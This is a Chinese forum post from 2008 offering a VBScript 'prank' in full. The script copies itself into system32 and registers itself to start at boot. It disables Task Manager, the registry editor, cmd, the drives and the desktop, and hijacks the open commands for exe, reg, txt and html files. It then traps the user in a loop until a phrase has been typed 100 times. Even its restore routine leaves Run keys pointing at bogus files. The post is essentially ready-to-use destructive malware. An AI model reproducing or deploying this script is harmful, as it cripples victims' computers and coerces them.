[原创] 用VBS写的一个恶作剧

银行骗子

一年级

Rank: 1

帖子: 125
精华: 0
威望: 2 度
金币: 369 枚
最后登录: 2008-8-28

1^# 大中小发表于 2008-1-9 14:46 只看该作者

用VBS写的一个恶作剧

它主要是把注册表改得乱七八糟的，这个也没什么看头可以看的只是怎么用VBS改注册表而已。
有些是用重启才生效的，不过我不会用VBS让系统注销，比如直接运行没用重启的话，可以到c:\windows\system32\ 下找到a.vbs改一下再运行一个就可以恢复了（文件名可以改）。。。我也不会屏蔽F8，所以还可以到安全模式下改回来了。
我不会用VBS重启系统，我只有用VB来写出这个VBS再重启系统了。。

其代码如下：

On Error Resume Next '防止出现错误
Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Sleep 1000 '将脚本执行挂起1秒
fso.copyfile(WScript.ScriptName),"c:\winnt\system32\a.vbs"
fso.copyfile(WScript.ScriptName),"c:\WINDOWS\system32\a.vbs"
fso.DeleteFile(WScript.ScriptName) '删除脚本自身
Dim WSHShell
Set WSHShell = WScript.CreateObject("WScript.Shell")
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\baidnvog","c:\winnt\system32\a.vbs"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\baidnvogok","c:\WINDOWS\system32\a.vbs"
WSHShell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
WSHShell.RegWrite "HKCU\Software\Microsoft\Windows\Current Version\Policies\System\DisableRegistryTools",1,"REG_DWORD"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",1,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartBanner",00000001,"REG_BINARY"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu",1,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",1,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",00000001,"REG_BINARY"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood",1,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon",1,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",00000004,"REG_BINARY"
WSHShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",00000007,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskba",1,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\WinOldApp\Disabled",1,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode",1,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD",1,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowser SaveAs",1,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContext Menu",1,"REG_DWORD"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive",ffffffff,"REG_DWORD"
WSHShell.RegWrite "HKEY_CLASSES_ROOT\regfile\shell\open\command\","2"
WSHShell.RegWrite "HKEY_CLASSES_ROOT\exefile\shell\open\command\","c:\22212323.exe"
WSHShell.RegWrite "HKEY_CLASSES_ROOT\txtfile\shell\open\command\","0"
WSHShell.RegWrite "HKEY_CLASSES_ROOT\htmlfile\shell\open\command\","22"
Dim name
dim i
i=0
Do while true
name = InPutBox ("输入'我爱死你了'100次就可以关闭窗口,系统就恢复正常.","输入")
if name = "我爱死你了" Then
i=i+1
if i=100 then
WSHShell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",0,"REG_DWORD"
WSHShell.RegWrite "HKCU\Software\Microsoft\Windows\Current Version\Policies\System\DisableRegistryTools",0,"REG_DWORD"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",0,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartBanner",00000000,"REG_BINARY"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu",0,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",0,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",0,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",00000000,"REG_BINARY"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood",0,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon",0,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",00000000,"REG_BINARY"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",0,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",0,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",0,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskba",0,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\WinOldApp\Disabled",0,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode",0,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD",0,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",0,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowser SaveAs",0,"REG_DWORD"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContext Menu",0,"REG_DWORD"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive",0,"REG_DWORD"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","Explorer.exe"
WSHShell.RegWrite "HKEY_CLASSES_ROOT\regfile\shell\open\command\","regedit.exe %1"
WSHShell.RegWrite "HKEY_CLASSES_ROOT\exefile\shell\open\command\","%1 %*"
WSHShell.RegWrite "HKEY_CLASSES_ROOT\txtfile\shell\open\command\","%systemroot%\system32\NOTEPAD.EXE %1","REG_EXPAND_SZ"
WSHShell.RegWrite "HKEY_CLASSES_ROOT\htmlfile\shell\open\command\","C:\Program Files\Internet Explorer\iexplore.exe -nohome"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\baidnvog","c:\VULII.SYS"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\baidnvogok","c:\qq.exe"
f = fso.DeleteFile(WScript.ScriptName)
exit Do
end if
Else
MsgBox "输入不正确,后果自负!",4+16,"警告"
end if
loop

TOP

‹‹ 上一主题 | 下一主题 ››

Processed in 0.454528 second(s), 5 queries, Gzip enabled.